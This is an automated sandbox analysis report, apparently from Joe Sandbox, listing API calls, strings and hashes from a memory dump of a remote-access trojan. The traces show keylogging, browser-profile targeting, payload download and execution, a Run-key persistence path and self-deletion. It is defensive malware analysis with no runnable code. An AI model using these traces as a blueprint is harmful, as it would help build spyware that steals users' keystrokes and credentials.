                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                                        Strings
                                                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LocalTime
                                                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                                                        • API String ID: 481472006-1507639952
                                                                                                        • Opcode ID: 76d5dd6ecd4cf0ae01fc24a6e422c0d46a6680b11c9869ab6839a1ab8c86e845
                                                                                                        • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                                                        • Opcode Fuzzy Hash: 76d5dd6ecd4cf0ae01fc24a6e422c0d46a6680b11c9869ab6839a1ab8c86e845
                                                                                                        • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32 ref: 0041667B
                                                                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DownloadFileSleep
                                                                                                        • String ID: !D@
                                                                                                        • API String ID: 1931167962-604454484
                                                                                                        • Opcode ID: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                                                                        • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                                                                        • Opcode Fuzzy Hash: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                                                                        • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                                                        APIs
                                                                                                        • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LocalTime
                                                                                                        • String ID: | $%02i:%02i:%02i:%03i
                                                                                                        • API String ID: 481472006-2430845779
                                                                                                        • Opcode ID: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                                                                        • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                                                        • Opcode Fuzzy Hash: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                                                                        • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                                                        APIs
                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExistsFilePath
                                                                                                        • String ID: alarm.wav$hYG
                                                                                                        • API String ID: 1174141254-2782910960
                                                                                                        • Opcode ID: a67f3d5249a1fb94c92f6e91cc59b1f19d843fcb2bd7b99b2c155253ed97e9bb
                                                                                                        • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                                                                        • Opcode Fuzzy Hash: a67f3d5249a1fb94c92f6e91cc59b1f19d843fcb2bd7b99b2c155253ed97e9bb
                                                                                                        • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                          • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                                        • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                        • String ID: Online Keylogger Stopped
                                                                                                        • API String ID: 1623830855-1496645233
                                                                                                        • Opcode ID: d648d1a5222b06a5ee4967885c863a2486092fd33b051c0742ca5bf23bf5bbb2
                                                                                                        • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                                                        • Opcode Fuzzy Hash: d648d1a5222b06a5ee4967885c863a2486092fd33b051c0742ca5bf23bf5bbb2
                                                                                                        • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                                                        APIs
                                                                                                        • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
                                                                                                        • waveInAddBuffer.WINMM(?,00000020), ref: 0040185F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: wave$BufferHeaderPrepare
                                                                                                        • String ID: XMG
                                                                                                        • API String ID: 2315374483-813777761
                                                                                                        • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                                        • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                                        • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                                        • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                                        APIs
                                                                                                        • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LocaleValid
                                                                                                        • String ID: IsValidLocaleName$kKD
                                                                                                        • API String ID: 1901932003-3269126172
                                                                                                        • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                                        • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                                        • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                                        • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                                                        APIs
                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExistsFilePath
                                                                                                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                        • API String ID: 1174141254-4188645398
                                                                                                        • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                                        • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                                                        • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                                        • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                                                        APIs
                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExistsFilePath
                                                                                                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                        • API String ID: 1174141254-2800177040
                                                                                                        • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                                        • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                                        • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                                        • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                                        APIs
                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExistsFilePath
                                                                                                        • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                        • API String ID: 1174141254-1629609700
                                                                                                        • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                                        • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                                                        • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                                        • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                                        APIs
                                                                                                        • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                                          • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                                                                          • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                          • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                                                                                          • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                          • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                                                                          • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                                                                          • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                                                                          • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                        • String ID: [AltL]$[AltR]
                                                                                                        • API String ID: 2738857842-2658077756
                                                                                                        • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                        • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                                        • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                        • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                                        APIs
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExecuteShell
                                                                                                        • String ID: !D@$open
                                                                                                        • API String ID: 587946157-1586967515
                                                                                                        • Opcode ID: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                                                                        • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                                        • Opcode Fuzzy Hash: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                                                                        • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                                        APIs
                                                                                                        • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: State
                                                                                                        • String ID: [CtrlL]$[CtrlR]
                                                                                                        • API String ID: 1649606143-2446555240
                                                                                                        • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                        • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                                        • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                        • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                                        APIs
                                                                                                          • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                        • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Init_thread_footer__onexit
                                                                                                        • String ID: ,kG$0kG
                                                                                                        • API String ID: 1881088180-2015055088
                                                                                                        • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                                        • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                                                        • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                                        • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DeleteOpenValue
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                        • API String ID: 2654517830-1051519024
                                                                                                        • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                        • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                                        • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                        • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                                        APIs
                                                                                                        • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DeleteDirectoryFileRemove
                                                                                                        • String ID: pth_unenc
                                                                                                        • API String ID: 3325800564-4028850238
                                                                                                        • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                        • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                                                        • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                        • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                                                        APIs
                                                                                                        • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ObjectProcessSingleTerminateWait
                                                                                                        • String ID: pth_unenc
                                                                                                        • API String ID: 1872346434-4028850238
                                                                                                        • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                                        • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                                                                        • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                                        • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                                                        • GetLastError.KERNEL32 ref: 00440D85
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1717984340-0
                                                                                                        • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                        • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                                        • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                        • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                                        APIs
                                                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                                        • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                                                        • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 4100373531-0
                                                                                                        • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                        • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                                        • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                        • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99